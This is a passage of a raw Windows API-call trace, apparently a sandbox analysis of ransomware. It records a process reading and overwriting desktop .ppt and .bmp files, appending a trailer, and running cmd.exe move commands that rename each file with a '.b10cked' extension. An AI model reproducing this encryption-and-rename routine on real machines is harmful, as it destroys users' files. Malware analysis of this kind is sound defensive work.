lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x6dc, dwThreadId=0x3a4)) returned 1 [0228.817] CloseHandle (hObject=0x120) returned 1 [0228.817] CloseHandle (hObject=0x1b4) returned 1 [0228.817] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.817] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.817] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0228.817] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.817] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.817] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0228.817] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.817] ReleaseMutex (hMutex=0xf8) returned 1 [0228.817] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.817] ReleaseMutex (hMutex=0xf8) returned 1 [0228.817] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.817] ReleaseMutex (hMutex=0xf8) returned 1 [0228.817] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.817] ReleaseMutex (hMutex=0xf8) returned 1 [0228.817] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.817] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.817] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28560680894) returned 1 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x24d5 [0228.819] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x29bd [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x29bd [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.821] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.821] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x14dd, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x14dd, lpOverlapped=0x0) returned 1 [0228.821] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.821] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x14dd, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x14dd, lpOverlapped=0x0) returned 1 [0228.821] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-5341, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x14e0 [0228.821] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x14dd, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x14dd, lpOverlapped=0x0) returned 1 [0228.821] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-5341, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x14e0 [0228.821] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x14dd, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x14dd, lpOverlapped=0x0) returned 1 [0228.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tWV414DCFHSA.ppt", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0228.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tWV414DCFHSA.ppt", cchWideChar=16, lpMultiByteStr=0x1328794, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tWV414DCFHSA.ppt", lpUsedDefaultChar=0x0) returned 16 [0228.826] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x29bd [0228.826] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.826] CloseHandle (hObject=0x1b4) returned 1 [0229.171] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT") returned 0x25 [0229.171] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0229.171] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x130, dwThreadId=0xd98)) returned 1 [0229.176] CloseHandle (hObject=0x120) returned 1 [0229.176] CloseHandle (hObject=0x1b4) returned 1 [0229.176] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.176] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0229.176] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0229.176] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.176] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.176] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0229.177] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.177] ReleaseMutex (hMutex=0xf8) returned 1 [0229.177] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.177] ReleaseMutex (hMutex=0xf8) returned 1 [0229.177] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.177] ReleaseMutex (hMutex=0xf8) returned 1 [0229.177] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.177] ReleaseMutex (hMutex=0xf8) returned 1 [0229.177] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28596632063) returned 1 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x11de4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x118fc [0229.178] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x11de4 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0229.179] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x11de4 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.180] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8ef1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8ef1, lpOverlapped=0x0) returned 1 [0229.180] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.180] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x8ef1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x8ef1, lpOverlapped=0x0) returned 1 [0229.180] SetFilePointer (in: 